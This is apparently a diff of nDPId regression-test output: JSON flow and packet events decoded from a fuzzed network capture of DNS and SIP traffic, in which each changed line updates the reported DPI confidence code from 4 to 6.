-00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":506,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470779487,"flow_last_seen":1120470780685,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470780685,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":506,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470779487,"flow_last_seen":1120470780685,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470780685,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470781608,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1120470781608,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470781608,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa5wAAIARSrHAqKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":3,"flow_last_seen":1120470782692,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470782692,"pkt":"ADBUADRWAODtAW69CABFAABIa54AAIARS7PAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":511,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470784796} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":511,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470782692,"pkt":"ADBUADRWAODtAW69CABFAAB6a58AAIARS7LAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAAJF9zaXAEX3VkcANzaXAJeXliZXJjaXR5AmRrAAAhAAE="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1120470788806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470788806,"pkt":"ADBUADRWAODtAW69CABFAABIa6AAAIARS7HAqAECwKgBgQrsADUANNbHUxEBAAABAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796801,"flow_last_seen":1120470796801,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470796801,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1120470796801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470796801,"pkt":"ADBUADRWAODtAW69CABFAABEa6EAAIARS7TAqAECwKgBAQrtADUAMFm\/yxIAAAABAAAAQAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycFwAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796801,"flow_last_seen":1120470796801,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470796801,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arp_","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796801,"flow_last_seen":1120470796801,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470796801,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arp_","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":1120470796802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470796802,"pkt":"AODtAW69ADBUADRWCABFiQBbAABAAEARtz7AqAEBwKgBAgA1Cu0ARzw7yxKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470796802,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470796802,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":200000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1120470796941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":524,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":524,"pkt_l4_len":490,"thread_ts_msec":1120470796941,"pkt":"AODtAW69ADBUADRWCABFAAH+AABAADcRii\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"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":200000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":200000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":517,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470797172} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":517,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470796941,"pkt":"ADBUADRWAODtAW69CABFAACBa6MAAIARSyVzAAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXB0Y3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1120470798172,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470798172,"pkt":"ADBUABRUAODtAW69CABFAABIa6QAAIARS63AqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00561{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":519,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470187656,"flow_last_seen":1120470440137,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":1120470800175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470800175,"pkt":"ADBUADRWAODtAW69CABFAABIa6UAAIARS6zAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":520,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2167,"global_ts_msec":1120470802178} 
@@ -1010,17 +1010,17 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":3,"flow_last_seen":1120470806184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470806184,"pkt":"ADBUADRWAODtAW69CABFAABIa6cAAIARS6rAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1120470814186,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470814186,"pkt":"ADBUADRWAODtAW69CABFAABEa6gAAIARS63AqAECwKgBAQrvADXTMAi8HBQAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 
-00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470814187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1120470814187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470814187,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKh3AgA1Cu8AR+s3HBSAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAUAAAJxAACwlsb2NhbGhvc3QA"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470814187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470814187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 